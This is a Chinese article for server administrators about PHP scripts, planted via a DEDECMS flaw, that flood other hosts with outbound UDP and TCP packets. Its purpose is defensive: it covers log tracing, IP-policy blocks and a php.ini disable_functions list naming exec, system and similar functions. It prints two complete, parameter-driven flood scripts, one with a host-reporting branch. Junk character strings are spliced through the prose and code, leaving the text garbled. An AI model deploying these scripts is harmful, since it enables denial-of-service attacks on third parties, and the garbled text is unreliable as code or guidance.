服务器php对外发包引起崩溃的解决办法paopao最近老听人说,php对外发包,引起服务器崩溃或被机房查封,今天闲着无事和大家一起分享paopao我总结的DEDECMS php对外发包引发服务器崩溃的终极解决方法,希望可以帮助大家解决服务器问题,让网站运行的更好
( N1 M5 j. M$ K) C$ `/ w2 j) t 一。php对外发包分析% f2 w& W" E! y
用php代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:
1 ?+ C5 E% I' q/ ^. {0 S 以下是代码片段:
7 n* z8 F( n3 C0 S1 c# v $packets = 0;6 O% G9 p2 h4 R6 o
$ip = $_GET[\'ip\'];! o. a+ _, `2 U; ?) a6 G% Z3 k
$rand = $_GET[\'port\'];
% _: [- T$ i$ K- I T" X set_time_limit(0);
* C3 f; ^5 B% s. F! t ignore_user_abort(FALSE);! y, W* g* k: {7 g5 m: x5 ^9 o
$exec_time = $_GET[\'time\'];sbxl-20120612
+ u& V6 m: T$ h $time = time();9 e* I$ c8 e. G8 p
print \'Flooded: $ip on port $rand
P5 C) K4 L# T$ ?' s( A \';
# v1 ~* Z O/ [, a0 B, h $max_time = $time+$exec_time;
* z3 m2 d4 y( g4 B) b2 P O+ u for($i=0;$i<65535;$i++){2 X3 ]3 w/ E$ k
$out .= \'X\';% j5 i+ x" X5 W
}. T) d6 `% p0 w. y
while(1){( w5 `* h6 b. |/ y2 I# B
$packets++;
9 X, K) g* k S1 g; S% P if(time() > $max_time){
) G7 \1 q3 C- \. U. w break;% y8 C: g4 `: a1 \4 X# r
}
+ }9 r/ K2 i+ @9 l4 e- ] $fp = fsockopen(\'udp://$ip\', $rand, $errno, $errstr, 5);
& m t1 X, N4 \1 h0 ^% d" M if($fp){8 q- J9 J) E6 {" h+ V! T! c. Z
fwrite($fp, $out);( b3 C- D; k$ @# l2 n- ?
fclose($fp);# P: u/ [1 N3 N( E
}% N |, p2 M6 a. B% ]
} x! x P6 o( [2 M3 k9 {
echo \'Packet complete at \'.time(\'h:i:s\').\' with' {: j8 c0 a8 O
$packets (\' . round(($packets*65)/1024, 2) . \' mB) packets averaging \'.$ R @4 P; m9 t; s& x1 Z4 t
round($packets/$exec_time, 2) . \' packets/s ;
q8 b8 E$ ^+ f# z ?>/ F8 `5 i$ y& U3 e2 Z) \
二。表现特征6 D8 A3 m, y% R0 C
一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是服务器不断收到大量数据包.0 T; h u% K0 S7 N3 R7 r
近期由于DEDECMS出现漏洞而导致大量服务器出现这个问题.
0 H. y7 f7 n# F- e6 F) \ 如何快速找到这些站?' h2 _5 ~5 I- f0 z8 g
你可以打开日志
+ [: W% H4 ~4 r, D5 @ C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打开今天时间的文件,2 ~* E7 r" |$ ^* F
里面有类似这样的记录:6 ]+ {/ ^! x, I( v4 }, G0 o( j
2012-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1
5 b& `% p {, T: Y. Z 最后三项783 Disabled 30_FreeHost_1
. z% o6 |9 s) @; k3 v; r 783就是这个站在IIS中的ID
1 b; q) y, q; D 30_FreeHost_1就是所在池4 G* a) y( R' P, j' I# {
三?解决办法
& A- X3 W; J& v5 K) }( m# Z. G 1.按上述找到这个网站后停止它.或停止池,并重启IIS.8 k% ?5 s- R, t! d/ J9 @
2.在IP策略,或防火墙中,禁止所有udp向外发送9 b/ J( v/ p: [, E- v1 ?
在星外最新版本的安全包中,已带有4.0版本的IP策略【下载safe包】,您导入后就直接可以限制了外发的UDP包?下载这个包,之后导入安全策略?但这个策略并没有关闭DNS端口,部分攻击还是有效.5 U* h4 U5 U/ J* _3 ?
为了解决这个问题,你也可以调整IP策略,限制udp只能访问特定的DNS服务器IP,如8.8.8.8,除非黑客攻击这个IP,不然攻击也是无效的,你可以在网卡DNS中设置一个你才知道的DNS IP,并且不要公开,然后调用IP策略中的udp open部分就可以解决.(打开IP策略的属性,双击open,将open中的两条udp记录删除任意一条,在保留的这条中,双击,改成 地址 从源地址 任何地址 到目标地址'特定IP 这个IP就是设置为你自己的DNS IP,如8.8.8.8' 保存后就行了)
1 _" _" m2 |9 \$ ~7 T* `* _( W 在2011-4-27,我们上传了新的安全包,里面有一个'星外虚拟主机管理平台IP策略关闭所有UDP端口用.ipsec'文件,您可以导入它并启用,就可以关闭所有udp端口,就可以完全防止这类攻击,但是,这个策略由于关闭了DNS端口,会造成的这台服务器上无法用IE访问任何域名,因此,用户的采集功能也就用不了.(同样,如果在主控网站上用了这个策略,就会造成的受控自检不通过,因为解析不了域名,另外,部分用户反映此策略会造成的mysql不正常)3 m" r3 t! S' l9 L
3.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词(其他关键词可以删除.)6 k) l5 D, @( F8 I, y
4.也可以直接禁止上面的代码,如改win\php.ini后重启IIS9 B5 F4 ~2 u$ h
ignore_user_abort = On
! F$ r) `% Y+ \6 v$ e6 V (注意前面的;号要删除)
+ W* J D3 v8 z3 Y disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,4 Q1 J4 d. G( W! Y
在后面加上
5 D3 c' m C; V; i: T- Q fsockopen,set_time_limit( P% |+ Q( P7 ~ o
但这样会造成很多php程序都不正常.7 O: K9 H9 {; D! _2 }1 I2 r7 ^' D1 R
另外,这也表明你的服务器安全做得不错,如果能入侵.黑客就直接提权了,还DOS做什么?6 i& E. ~9 ~6 K
近期已有新的基于TCP攻击的PHPDDOS代码如下:% c( D& C* m4 C6 b. i
以下是代码片段:
5 g5 v# @3 v' X9 ~6 v9 T set_time_limit(999999);
^0 B# g- b) R/ A% Z $host = $_GET['host'];
" i$ Y9 ~" Y* F: n $port = $_GET['port'];
: T$ J4 M& r5 J% { $exec_time = $_GET['time'];
; V8 ]3 g5 f+ B }. l $packets = 64;, F% ~3 w# u# n1 h
ignore_user_abort(True);0 w: u9 e4 \9 L8 _
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){/ r, f1 R5 G2 @5 T1 o
if (StrLen($_GET['rat'])<>0){
! z* c W4 u+ o/ | echo $_GET['rat'].$_SERVER['HTTP_HOST'].'|'.GetHostByName($_SERVER['SERVER_NAME']).'|'.
3 P1 l& O- ^& i& Z php_uname().'|'.$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
* L' h: M5 n) g1 A+ L exit;
: u$ ~- f) o8 |; i }
6 f1 O6 r4 f" n$ m exit;
: s* W5 K7 l* Y }
# ~( Q1 E B6 ?) u. y5 y $max_time = time()+$exec_time;5 n. W9 V p) Z! M
while(1){1 {& Q2 g0 a) A U/ Z
$packets++;
, Z6 S8 P& N& W! I. P8 n if(time() > $max_time or $exec_time != 69){
" z0 a, B& b% J% N0 S/ P# v break;& ?5 i1 I+ h0 O% {
}) T: E8 k9 j( g( E1 A
$fp = fsockopen('tcp://$host', $port, $errno, $errstr, 0);
1 x; t- {4 z, H: M* z }
0 x) u/ _/ B5 d4 x( ]7 Q ?>
; {! T) G/ x5 C3 @; v5 Z 同样,可以采有以下解决办法:
) V3 q) s2 O$ Y9 }" f: p 1.也可以直接禁止上面的代码,如改win\php.ini后重启IIS
4 A' r8 _. S, Z, u% j ignore_user_abort = On
[6 e5 V7 e/ c (注意前面的;号要删除)
. Y8 E8 \8 H, \" d) g! o/ u) @ disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,$ i: J+ x8 G) }2 ]& w7 w
在后面加上
( z" u5 E3 n' q2 Y9 ? fsockopen,set_time_limit
/ w$ V, ~! E* u# e5 S& z, k 但这样会造成很多php程序都不正常. 如果您是IDC,给客户提供空间的,禁用函数可能导致客户程序无法运行,所以一般不要用此办法) Z/ W* W% _: l9 R
2.在IP策略中禁止所有外访的TCP数据包,但这样会造成的采集功能无效,也不能用在主控服务器上?; O2 u3 s, u0 W6 R4 U, i
3.在服务器要用关键词tcp:或udp:搜索所有php类文件,找到攻击文件,删除它?0 e7 e6 J6 L8 [! Y7 r+ H' Q
文章出自医院网站优化 http://www.ahyyqing.com,转载请注明出处。 U2 w5 C+ w, t, v& T
|
